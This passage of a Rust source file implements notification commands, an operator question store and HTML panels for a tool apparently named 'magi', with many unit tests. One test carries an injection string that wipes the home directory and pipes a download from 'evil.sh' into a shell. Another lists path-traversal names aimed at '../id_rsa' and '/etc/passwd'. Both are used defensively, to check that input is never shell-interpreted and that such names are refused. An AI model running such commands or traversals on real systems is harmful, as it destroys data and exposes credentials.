1779 .kill_on_drop(true);
1782 let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1783 Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1784 Err(_) => bail!(
1785 "notification command `{program}` did not finish within {}s",
1786 NOTIFY_TIMEOUT.as_secs()
1787 ),
1788 };
1789 if !out.status.success() {
1790 let stderr = String::from_utf8_lossy(&out.stderr);
1791 let why = stderr
1792 .lines()
1793 .rev()
1794 .find(|l| !l.trim().is_empty())
1795 .unwrap_or("no output on stderr")
1796 .trim();
1797 bail!(
1798 "notification command `{program}` exited with {}: {why}",
1799 out.status
1800 );
1801 }
1802 Ok(())
1803}
1804
1805fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
1811 let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1812 let mut out = String::with_capacity(template.len());
1813 let mut rest = template;
1814 while let Some(at) = rest.find('{') {
1815 out.push_str(&rest[..at]);
1816 let tail = &rest[at..];
1817 match table.iter().find(|(token, _)| tail.starts_with(token)) {
1818 Some((token, value)) => {
1819 out.push_str(value);
1820 rest = &tail[token.len()..];
1821 }
1822 None => {
1823 out.push('{');
1825 rest = &tail[1..];
1826 }
1827 }
1828 }
1829 out.push_str(rest);
1830 out
1831}
1832
1833fn web_url() -> String {
1835 question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1836}
1837
1838fn question_url(base: &str) -> String {
1845 let base = base.trim().trim_end_matches('/');
1846 if base.is_empty() || base.contains('#') {
1847 return base.to_owned();
1848 }
1849 format!("{base}/#/questions")
1850}
1851
1852fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1857 let index = dir.join(PANEL_HTML);
1858 std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1859 for (name, src) in assets {
1860 let dst = dir.join(name);
1861 std::fs::copy(src, &dst)
1862 .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1863 }
1864 Ok(())
1865}
1866
1867fn clear_dir(path: &Path) -> Result<()> {
1872 match std::fs::remove_dir_all(path) {
1873 Ok(()) => Ok(()),
1874 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1875 Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1876 }
1877}
1878
1879fn read_path(path: &Path) -> Result<Question> {
1880 let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1881 let q: Question =
1882 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1883 if q.schema > SCHEMA {
1884 bail!(
1889 "question {} was written by a newer magi (schema {}, this build \
1890 only speaks up to {SCHEMA})",
1891 q.id,
1892 q.schema
1893 );
1894 }
1895 Ok(q)
1896}
1897
1898pub fn short_id(id: &str) -> &str {
1900 short(id)
1901}
1902
1903fn short(id: &str) -> &str {
1904 id.split('-').next_back().unwrap_or(id)
1905}
1906
1907fn new_id() -> String {
1908 let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1909 let seed = crate::rng::entropy();
1910 format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1911}
1912
1913#[cfg(test)]
1914mod tests {
1915 use super::*;
1916
1917 fn store() -> (tempfile::TempDir, Questions) {
1920 let dir = tempfile::tempdir().unwrap();
1921 let s = Questions::at(dir.path().join("questions"));
1922 (dir, s)
1923 }
1924
1925 #[test]
1926 fn run_names_task_only_for_task_questions() {
1927 for (node, want) in [
1928 (crate::conduct::NODE, true),
1929 (crate::triage::NODE, true),
1930 (crate::triage::DEPS_NODE, true),
1931 (crate::land::APPROVAL_NODE, false),
1932 (crate::bump::NOTICE_NODE, false),
1933 ("implement", false),
1934 ] {
1935 let mut q = choice_question();
1936 q.node = node.to_owned();
1937 assert_eq!(q.run_names_task(), want, "{node}");
1938 }
1939 }
1940
1941 #[test]
1942 fn deleting_a_run_stops_its_questions_asking() {
1943 let (_dir, store) = store();
1944
1945 let mut open_one = choice_question();
1946 store.put(&mut open_one).unwrap();
1947 let mut answered = free_question();
1948 answered
1949 .answer(Answer::Text("keep this".to_owned()))
1950 .unwrap();
1951 store.put(&mut answered).unwrap();
1952 let mut elsewhere = choice_question();
1953 elsewhere.run = "20260903-105039-3cbf".to_owned();
1954 store.put(&mut elsewhere).unwrap();
1955
1956 let n = store
1957 .abandon_for_run(&open_one.run, "run was deleted")
1958 .unwrap();
1959 assert_eq!(n, 1, "only the open question of that run");
1960
1961 let back = store.get(&open_one.id).unwrap();
1962 assert!(!back.status.open(), "it no longer asks for a decision");
1963 assert!(
1964 back.detail.contains("run was deleted"),
1965 "the operator can see why: {}",
1966 back.detail
1967 );
1968
1969 let kept = store.get(&answered.id).unwrap();
1970 assert_eq!(
1971 kept.status,
1972 QuestionStatus::Answered,
1973 "an answered question is a decision on record, not something to revoke"
1974 );
1975 assert!(
1976 store.get(&elsewhere.id).unwrap().status.open(),
1977 "another run's question is untouched"
1978 );
1979 assert!(store.open_for(&open_one.run).is_empty());
1980 }
1981
1982 #[test]
1983 fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
1984 let (_dir, store) = store();
1985 let mut q = choice_question();
1986 store.put(&mut q).unwrap();
1987
1988 let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
1990 assert_eq!(n, 0);
1991 assert!(store.get(&q.id).unwrap().status.open());
1992
1993 let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
1996 assert_eq!(n, 1);
1997 let back = store.get(&q.id).unwrap();
1998 assert!(!back.status.open());
1999 assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
2000
2001 assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
2003 }
2004
2005 fn choice_question() -> Question {
2006 Question::new(
2007 "20260902-201256-9fb7".to_owned(),
2008 "implement".to_owned(),
2009 "impl-A".to_owned(),
2010 "Which storage backend should the cache use?".to_owned(),
2011 "Both are already dependencies.".to_owned(),
2012 vec!["SQLite".to_owned(), "Redis".to_owned()],
2013 )
2014 }
2015
2016 fn free_question() -> Question {
2017 Question::new(
2018 "20260902-201256-9fb7".to_owned(),
2019 "review".to_owned(),
2020 "rev-1".to_owned(),
2021 "What should the error message say?".to_owned(),
2022 String::new(),
2023 Vec::new(),
2024 )
2025 }
2026
2027 fn quiet() -> config::Notify {
2029 config::Notify::default()
2030 }
2031
2032 #[test]
2033 fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
2034 let mut q = choice_question();
2038 q.id = "20260902-231501-ab12".to_owned();
2039 let open: serde_json::Value = serde_json::to_value(&q).unwrap();
2040 let keys: Vec<&str> = open
2044 .as_object()
2045 .unwrap()
2046 .keys()
2047 .map(String::as_str)
2048 .collect();
2049 assert_eq!(
2050 keys,
2051 [
2052 "actions",
2053 "answer",
2054 "answer_delivered",
2055 "answer_timeout",
2056 "answered_at",
2057 "asked_at",
2058 "assets",
2059 "choices",
2060 "consult",
2061 "cwd",
2062 "delivered_turns",
2063 "deputy",
2064 "detail",
2065 "id",
2066 "node",
2067 "panel",
2068 "run",
2069 "schema",
2070 "seat",
2071 "status",
2072 "summary",
2073 "thread",
2074 "waiter",
2075 ],
2076 "the on-disk field set is a contract with the front end"
2077 );
2078 assert_eq!(open["schema"], 6);
2079 assert_eq!(open["thread"], serde_json::json!([]));
2080 assert_eq!(open["id"], "20260902-231501-ab12");
2081 assert_eq!(open["run"], "20260902-201256-9fb7");
2082 assert_eq!(open["node"], "implement");
2083 assert_eq!(open["seat"], "impl-A");
2084 assert_eq!(open["status"], "open");
2085 assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
2086 assert_eq!(open["answered_at"], serde_json::Value::Null);
2087 assert_eq!(open["answer"], serde_json::Value::Null);
2088 let asked = open["asked_at"].as_str().unwrap();
2089 assert!(
2090 asked.ends_with('Z') && asked.contains('T'),
2091 "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
2092 );
2093
2094 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2096 let answered = serde_json::to_value(&q).unwrap();
2097 assert_eq!(answered["status"], "answered");
2098 assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
2099 assert!(answered["answered_at"].is_string());
2100
2101 let mut free = free_question();
2103 free.answer(Answer::Text("Say which file it was".to_owned()))
2104 .unwrap();
2105 assert_eq!(
2106 serde_json::to_value(&free).unwrap()["answer"],
2107 serde_json::json!({"text": "Say which file it was"})
2108 );
2109
2110 let body = serde_json::to_string(&q).unwrap();
2112 assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
2113 }
2114
2115 #[test]
2116 fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
2117 let mut unoffered = choice_question();
2120 let a = unoffered
2121 .answer(Answer::Choice("Postgres".to_owned()))
2122 .unwrap_err()
2123 .to_string();
2124
2125 let mut typed = choice_question();
2126 let b = typed
2127 .answer(Answer::Text("use Postgres".to_owned()))
2128 .unwrap_err()
2129 .to_string();
2130
2131 let mut blank = free_question();
2132 let c = blank
2133 .answer(Answer::Text(" \n".to_owned()))
2134 .unwrap_err()
2135 .to_string();
2136
2137 let mut twice = choice_question();
2138 twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2139 let d = twice
2140 .answer(Answer::Choice("Redis".to_owned()))
2141 .unwrap_err()
2142 .to_string();
2143
2144 assert!(a.contains("not one of the choices"), "{a}");
2145 assert!(b.contains("multiple choice"), "{b}");
2146 assert!(c.contains("empty"), "{c}");
2147 assert!(d.contains("already answered"), "{d}");
2148 let mut distinct = vec![a, b, c, d];
2149 let asked = distinct.len();
2150 distinct.sort_unstable();
2151 distinct.dedup();
2152 assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
2153
2154 assert_eq!(unoffered.status, QuestionStatus::Open);
2156 assert_eq!(typed.status, QuestionStatus::Open);
2157 assert_eq!(blank.status, QuestionStatus::Open);
2158 assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
2160
2161 let mut free = free_question();
2163 let e = free
2164 .answer(Answer::Choice("SQLite".to_owned()))
2165 .unwrap_err()
2166 .to_string();
2167 assert!(e.contains("free text"), "{e}");
2168 }
2169
2170 #[test]
2171 fn open_questions_are_listed_before_answered_ones() {
2172 let (_dir, s) = store();
2173 let mut old_open = choice_question();
2176 old_open.id = "20260101-000001-aaaa".to_owned();
2177 let mut new_open = choice_question();
2178 new_open.id = "20260101-000002-bbbb".to_owned();
2179 let mut answered = choice_question();
2180 answered.id = "20260101-000003-cccc".to_owned();
2181 answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
2182 for q in [&mut old_open, &mut new_open, &mut answered] {
2183 s.put(q).unwrap();
2184 }
2185
2186 let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
2187 assert_eq!(
2188 ids,
2189 [
2190 "20260101-000002-bbbb",
2191 "20260101-000001-aaaa",
2192 "20260101-000003-cccc"
2193 ],
2194 "what has stopped work comes first; history sorts underneath"
2195 );
2196 assert_eq!(s.count_open(), 2);
2197 assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
2198 assert!(s.open_for("some-other-run").is_empty());
2199 assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
2201 assert!(s.get("20260101-000002-bbbb").is_ok());
2202 assert!(s.resolve_id("nope").is_err());
2203 assert!(
2204 s.revision() > 0,
2205 "the store's mtime drives the phone's polling"
2206 );
2207 }
2208
2209 #[test]
2210 fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
2211 let (_dir, s) = store();
2212 let mut good = choice_question();
2213 s.put(&mut good).unwrap();
2214 std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
2216 let future = serde_json::json!({
2217 "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
2218 "seat": "s", "summary": "?", "detail": "", "choices": [],
2219 "status": "open", "asked_at": "2026-01-01T00:00:00Z",
2220 "answered_at": null, "answer": null,
2221 });
2222 std::fs::write(
2223 s.path_of("20260101-000010-beef"),
2224 serde_json::to_string(&future).unwrap(),
2225 )
2226 .unwrap();
2227
2228 let listed = s.list();
2229 assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
2230 assert_eq!(listed[0].id, good.id);
2231 let e = s.get("20260101-000010-beef").unwrap_err().to_string();
2233 assert!(e.contains("schema"), "{e}");
2234 }
2235
2236 #[tokio::test]
2237 async fn the_wait_returns_the_answer_another_process_wrote() {
2238 let (dir, s) = store();
2243 let mut q = choice_question();
2244 let id = q.id.clone();
2245 let writer = Questions::at(dir.path().join("questions"));
2246 let handle = tokio::spawn(async move {
2247 tokio::time::sleep(Duration::from_millis(30)).await;
2248 let mut fresh = writer.get(&id).expect("the question was filed first");
2249 fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2250 writer.put(&mut fresh).unwrap();
2251 });
2252
2253 let got = wait_for_owner(
2254 &mut q,
2255 &s,
2256 &quiet(),
2257 Duration::from_secs(5),
2258 Duration::from_millis(10),
2259 )
2260 .await
2261 .unwrap();
2262
2263 handle.await.unwrap();
2264 assert_eq!(got, Wait::Answered("SQLite".to_owned()));
2265 assert_eq!(
2266 q.status,
2267 QuestionStatus::Answered,
2268 "the caller's copy is refreshed from the answering process's record"
2269 );
2270 assert!(q.answered_at.is_some());
2271 }
2272
2273 #[tokio::test]
2274 async fn a_question_nobody_answers_is_abandoned_not_deleted() {
2275 let (_dir, s) = store();
2276 let mut q = choice_question();
2277
2278 let got = wait_for_owner(
2279 &mut q,
2280 &s,
2281 &quiet(),
2282 Duration::from_millis(60),
2283 Duration::from_millis(10),
2284 )
2285 .await
2286 .unwrap();
2287
2288 assert_eq!(
2289 got,
2290 Wait::Abandoned,
2291 "a slow human is not an error; the run parks"
2292 );
2293 assert_eq!(q.status, QuestionStatus::Abandoned);
2294 let on_disk = s.get(&q.id).expect("the record of what was asked survives");
2295 assert_eq!(on_disk.status, QuestionStatus::Abandoned);
2296 assert!(
2297 on_disk.detail.contains("Abandoned:"),
2298 "why nobody answered belongs with the question: {}",
2299 on_disk.detail
2300 );
2301 assert!(on_disk.resolution().is_none());
2302 assert_eq!(s.count_open(), 0);
2303 }
2304
2305 #[tokio::test]
2306 async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
2307 let (_dir, s) = store();
2312 let mut q = choice_question();
2313 s.put(&mut q).unwrap();
2314
2315 let got = wait_loop(
2316 &mut q,
2317 &s,
2318 Duration::from_secs(3600),
2319 Duration::from_millis(30),
2320 Duration::from_millis(10),
2321 )
2322 .await
2323 .unwrap();
2324
2325 assert_eq!(
2326 got,
2327 Wait::Pending,
2328 "the clock on this call ran out, not the owner's patience"
2329 );
2330 assert_eq!(
2331 q.status,
2332 QuestionStatus::Open,
2333 "a slice expiring must never abandon the question"
2334 );
2335 let on_disk = s.get(&q.id).expect("still on disk, still open");
2336 assert_eq!(
2337 on_disk.status,
2338 QuestionStatus::Open,
2339 "nothing about the record changed just because this call gave up"
2340 );
2341 }
2342
2343 #[tokio::test]
2344 async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
2345 let (dir, s) = store();
2350 let mut q = choice_question();
2351 s.put(&mut q).unwrap();
2352
2353 let first = wait_loop(
2354 &mut q,
2355 &s,
2356 Duration::from_secs(3600),
2357 Duration::from_millis(30),
2358 Duration::from_millis(10),
2359 )
2360 .await
2361 .unwrap();
2362 assert_eq!(first, Wait::Pending);
2363
2364 let id = q.id.clone();
2365 let writer = Questions::at(dir.path().join("questions"));
2366 let mut fresh = writer.get(&id).unwrap();
2367 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2368 writer.put(&mut fresh).unwrap();
2369
2370 let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2375 .await
2376 .unwrap();
2377 assert_eq!(second, Wait::Answered("Redis".to_owned()));
2378 assert_eq!(q.status, QuestionStatus::Answered);
2379 }
2380
2381 #[tokio::test]
2382 async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2383 let (dir, s) = store();
2393 let mut q = choice_question();
2394 s.put(&mut q).unwrap();
2395
2396 let first = wait_loop(
2397 &mut q,
2398 &s,
2399 Duration::from_secs(3600),
2400 Duration::from_millis(30),
2401 Duration::from_millis(10),
2402 )
2403 .await
2404 .unwrap();
2405 assert_eq!(first, Wait::Pending);
2406
2407 let id = q.id.clone();
2409 let writer = Questions::at(dir.path().join("questions"));
2410 let mut fresh = writer.get(&id).unwrap();
2411 fresh.say("why not Postgres?").unwrap();
2412 writer.put(&mut fresh).unwrap();
2413
2414 let mut resumed = s.get(&id).unwrap();
2418 let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2419 .await
2420 .unwrap();
2421 assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2422 assert_eq!(
2423 resumed.status,
2424 QuestionStatus::Open,
2425 "talking back is not a decision; the question stays open"
2426 );
2427 }
2428
2429 #[tokio::test]
2430 async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2431 let (dir, s) = store();
2435 let broken = config::Notify {
2436 command: vec![
2437 "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2438 "{summary}".to_owned(),
2439 ],
2440 };
2441 let mut q = choice_question();
2442 assert!(
2443 notify(&broken, &q).await.is_err(),
2444 "the caller is told; it decides that it does not matter"
2445 );
2446
2447 let id = q.id.clone();
2448 let writer = Questions::at(dir.path().join("questions"));
2449 let handle = tokio::spawn(async move {
2450 tokio::time::sleep(Duration::from_millis(30)).await;
2451 let mut fresh = writer.get(&id).unwrap();
2452 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2453 writer.put(&mut fresh).unwrap();
2454 });
2455 let got = wait_for_owner(
2456 &mut q,
2457 &s,
2458 &broken,
2459 Duration::from_secs(5),
2460 Duration::from_millis(10),
2461 )
2462 .await
2463 .unwrap();
2464 handle.await.unwrap();
2465 assert_eq!(got, Wait::Answered("Redis".to_owned()));
2466
2467 assert!(notify(&quiet(), &q).await.is_ok());
2469 assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2470 }
2471
2472 #[test]
2473 fn notification_arguments_are_substituted_and_never_a_shell_string() {
2474 let mut q = choice_question();
2475 q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2476 let template = [
2477 "ntfy".to_owned(),
2478 "publish".to_owned(),
2479 "--click".to_owned(),
2480 "{url}".to_owned(),
2481 "--title".to_owned(),
2482 "magi {run} needs you".to_owned(),
2483 "{summary}".to_owned(),
2484 ];
2485 let argv: Vec<String> = template
2486 .iter()
2487 .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2488 .collect();
2489
2490 assert_eq!(
2491 argv,
2492 [
2493 "ntfy",
2494 "publish",
2495 "--click",
2496 "http://100.64.0.1:7777/#/questions",
2497 "--title",
2498 "magi 20260902-201256-9fb7 needs you",
2499 "; rm -rf ~ && curl evil.sh | sh #",
2500 ],
2501 "the shell metacharacters are one argument's contents, not syntax"
2502 );
2503
2504 q.summary = "should {url} be configurable?".to_owned();
2507 assert_eq!(
2508 expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2509 "should {url} be configurable?"
2510 );
2511 assert_eq!(
2513 expand("{title}: {run}", &q.run, &q.summary, ""),
2514 "{title}: 20260902-201256-9fb7"
2515 );
2516 assert_eq!(
2517 expand("no placeholders", &q.run, &q.summary, "http://x"),
2518 "no placeholders"
2519 );
2520 }
2521
2522 #[test]
2523 fn the_notification_link_lands_on_the_view_that_can_answer() {
2524 assert_eq!(
2525 question_url("http://100.64.0.1:7777"),
2526 "http://100.64.0.1:7777/#/questions"
2527 );
2528 assert_eq!(
2529 question_url("http://100.64.0.1:7777/"),
2530 "http://100.64.0.1:7777/#/questions"
2531 );
2532 assert_eq!(
2534 question_url("http://magi.ts.net/#/runs"),
2535 "http://magi.ts.net/#/runs"
2536 );
2537 assert_eq!(question_url(" "), "");
2539 }
2540
2541 fn panelled() -> Question {
2543 let mut q = choice_question();
2544 q.id = "20260903-014455-ab12".to_owned();
2545 q
2546 }
2547
2548 #[test]
2549 fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2550 let (dir, s) = store();
2551 let work = dir.path().join("worktree");
2552 std::fs::create_dir_all(&work).unwrap();
2553 std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2554 std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2555
2556 let mut q = panelled();
2557 let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2558 s.put_panel(
2559 &mut q,
2560 html,
2561 &[work.join("table.png"), work.join("diff.svg")],
2562 )
2563 .unwrap();
2564 s.put(&mut q).unwrap();
2565
2566 assert!(q.panel);
2567 assert_eq!(
2568 q.assets,
2569 ["diff.svg", "table.png"],
2570 "sorted, not in the order the agent happened to pass them"
2571 );
2572 assert_eq!(
2573 s.panel_html(&q.id).as_deref(),
2574 Some(html),
2575 "the html is stored byte for byte; the agent authored the markup"
2576 );
2577 assert_eq!(
2578 s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2579 Some(&b"<svg/>"[..])
2580 );
2581
2582 let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2584 let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2585 assert_eq!(json["panel"], true);
2586 assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2587 let back = s.get(&q.id).unwrap();
2588 assert!(back.panel);
2589 assert_eq!(back.assets, q.assets);
2590
2591 std::fs::remove_dir_all(&work).unwrap();
2594 assert_eq!(
2595 s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2596 Some(&b"\x89PNG"[..]),
2597 "a referenced asset would be gone with the worktree"
2598 );
2599 }
2600
2601 #[test]
2602 fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2603 let (dir, s) = store();
2604 let mut q = panelled();
2605 s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2606 s.put(&mut q).unwrap();
2607
2608 let secret = "this must never reach the browser";
2611 std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2612 assert_eq!(
2613 std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2614 secret,
2615 "the traversal is real: the operating system resolves this path \
2616 happily, which is why the name has to be refused before the join"
2617 );
2618
2619 let long = "x".repeat(200);
2620 for name in [
2621 "..",
2622 "../id_rsa",
2623 "..\\id_rsa",
2624 "sub/../id_rsa",
2625 "/",
2626 "\\",
2627 "/etc/passwd",
2628 "C:\\Windows\\win.ini",
2629 "",
2630 ".hidden",
2631 ".",
2632 long.as_str(),
2633 ] {
2634 assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2635 let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2636 assert!(
2637 e.contains("not a panel file name"),
2638 "`{name}` must be refused as a name, not attempted: {e}"
2639 );
2640 assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2641 }
2642 assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2645
2646 let hidden = dir.path().join(".hidden");
2649 std::fs::write(&hidden, "x").unwrap();
2650 let e = s
2651 .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2652 .unwrap_err()
2653 .to_string();
2654 assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2655 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2656 assert!(q.assets.is_empty());
2657 }
2658
2659 #[test]
2660 fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2661 let (dir, s) = store();
2662 let mut q = panelled();
2663 s.put(&mut q).unwrap();
2664
2665 let big = dir.path().join("recording.png");
2668 std::fs::File::create(&big)
2669 .unwrap()
2670 .set_len(PANEL_MAX_BYTES)
2671 .unwrap();
2672
2673 let html = "<p>see the recording</p>";
2674 let total = PANEL_MAX_BYTES + html.len() as u64;
2675 let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2676 assert!(
2677 e.contains(&PANEL_MAX_BYTES.to_string()),
2678 "the cap is named so the agent knows the limit: {e}"
2679 );
2680 assert!(
2681 e.contains(&total.to_string()),
2682 "the actual size is named so the agent knows by how much: {e}"
2683 );
2684
2685 assert!(!q.panel);
2686 assert!(q.assets.is_empty());
2687 let left: Vec<String> = std::fs::read_dir(s.root())
2688 .unwrap()
2689 .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2690 .collect();
2691 assert_eq!(
2692 left,
2693 [format!("{}.json", q.id)],
2694 "a refused panel leaves neither a directory nor scratch: {left:?}"
2695 );
2696 }
2697
2698 #[test]
2699 fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2700 let (dir, s) = store();
2701 let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2702 std::fs::create_dir_all(&before).unwrap();
2703 std::fs::create_dir_all(&after).unwrap();
2704 std::fs::write(before.join("diff.png"), "before").unwrap();
2705 std::fs::write(after.join("diff.png"), "after").unwrap();
2706
2707 let mut q = panelled();
2708 let e = s
2709 .put_panel(
2710 &mut q,
2711 "<p>x</p>",
2712 &[before.join("diff.png"), after.join("diff.png")],
2713 )
2714 .unwrap_err()
2715 .to_string();
2716 assert!(e.contains("diff.png"), "{e}");
2717 assert!(
2718 e.contains("before") && e.contains("after"),
2719 "both sources are named, because the fix is to rename one: {e}"
2720 );
2721 assert!(!q.panel);
2722 assert!(!s.panel_dir(&q.id).exists());
2723 }
2724
2725 #[test]
2726 fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2727 let (dir, s) = store();
2728 std::fs::write(dir.path().join("old.png"), "old").unwrap();
2729 std::fs::write(dir.path().join("new.png"), "new").unwrap();
2730
2731 let mut q = panelled();
2732 s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2733 .unwrap();
2734 s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2735 .unwrap();
2736
2737 assert_eq!(q.assets, ["new.png"]);
2738 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2739 assert!(
2740 s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2741 "an asset from the first attempt would show a mix of two answers"
2742 );
2743
2744 s.drop_panel(&q.id).unwrap();
2745 assert!(s.panel_html(&q.id).is_none());
2746 assert!(!s.panel_dir(&q.id).exists());
2747 s.drop_panel(&q.id)
2748 .expect("dropping a panel that is already gone is the desired state");
2749 }
2750
2751 #[test]
2752 fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2753 let (_dir, s) = store();
2754 let mut q = panelled();
2755 s.put(&mut q).unwrap();
2756
2757 assert!(!q.panel);
2758 assert!(s.panel_html(&q.id).is_none());
2759 assert!(
2760 s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2761 "a missing file is a 404 for the caller, not a failure of the store"
2762 );
2763 let json = serde_json::to_value(&q).unwrap();
2764 assert_eq!(json["panel"], false);
2765 assert_eq!(json["assets"], serde_json::json!([]));
2766
2767 let e = s.put_panel(&mut q, " \n", &[]).unwrap_err().to_string();
2770 assert!(e.contains("empty panel"), "{e}");
2771 assert!(!s.panel_dir(&q.id).exists());
2772 }
2773
2774 #[test]
2775 fn a_question_written_before_panels_existed_still_deserialises() {
2776 let (_dir, s) = store();
2777 std::fs::create_dir_all(s.root()).unwrap();
2778 let id = "20260902-231501-ab12";
2779 let body = r#"{
2781 "schema": 1,
2782 "id": "20260902-231501-ab12",
2783 "run": "20260902-201256-9fb7",
2784 "node": "implement",
2785 "seat": "impl-A",
2786 "summary": "Which storage backend should the cache use?",
2787 "detail": "Both are already dependencies.",
2788 "choices": ["SQLite", "Redis"],
2789 "status": "open",
2790 "asked_at": "2026-09-02T23:15:01Z",
2791 "answered_at": null,
2792 "answer": null
2793}"#;
2794 std::fs::write(s.path_of(id), body).unwrap();
2795
2796 let q = s.get(id).unwrap();
2797 assert!(
2798 !q.panel,
2799 "an absent field means no panel, not a parse error"
2800 );
2801 assert!(q.assets.is_empty());
2802 assert_eq!(q.schema, 1);
2807 assert!(q.thread.is_empty());
2808 assert_eq!(
2809 q.answer_timeout, 0,
2810 "an absent field means unrecorded, not a zero-second deadline"
2811 );
2812 assert!(!q.waiting_on_agent());
2813 assert_eq!(q.summary, "Which storage backend should the cache use?");
2814 assert_eq!(
2815 s.list().len(),
2816 1,
2817 "and it is still listed; skipping it would hide an open question"
2818 );
2819 }
2820
2821 fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2822 Turn {
2823 who,
2824 body: body.to_owned(),
2825 at,
2826 }
2827 }
2828
2829 #[test]
2830 fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2831 let mut q = choice_question();
2834 q.thread
2835 .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2836 let value = serde_json::to_value(&q.thread[0]).unwrap();
2837 let mut keys: Vec<&str> = value
2838 .as_object()
2839 .unwrap()
2840 .keys()
2841 .map(String::as_str)
2842 .collect();
2843 keys.sort_unstable();
2844 assert_eq!(keys, ["at", "body", "who"]);
2845 assert_eq!(value["who"], "operator");
2846 assert_eq!(value["body"], "why not Postgres?");
2847
2848 let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2849 let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2850 assert_eq!(parsed.who, Who::Agent);
2851 }
2852
2853 fn approval_question() -> Question {
2854 let mut q = Question::new(
2855 "run".into(),
2856 crate::land::APPROVAL_NODE.into(),
2857 "land".into(),
2858 "Merge?".into(),
2859 String::new(),
2860 vec!["merge".into(), "hold".into()],
2861 );
2862 let mut dep = Deputy::new("brief".into());
2863 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
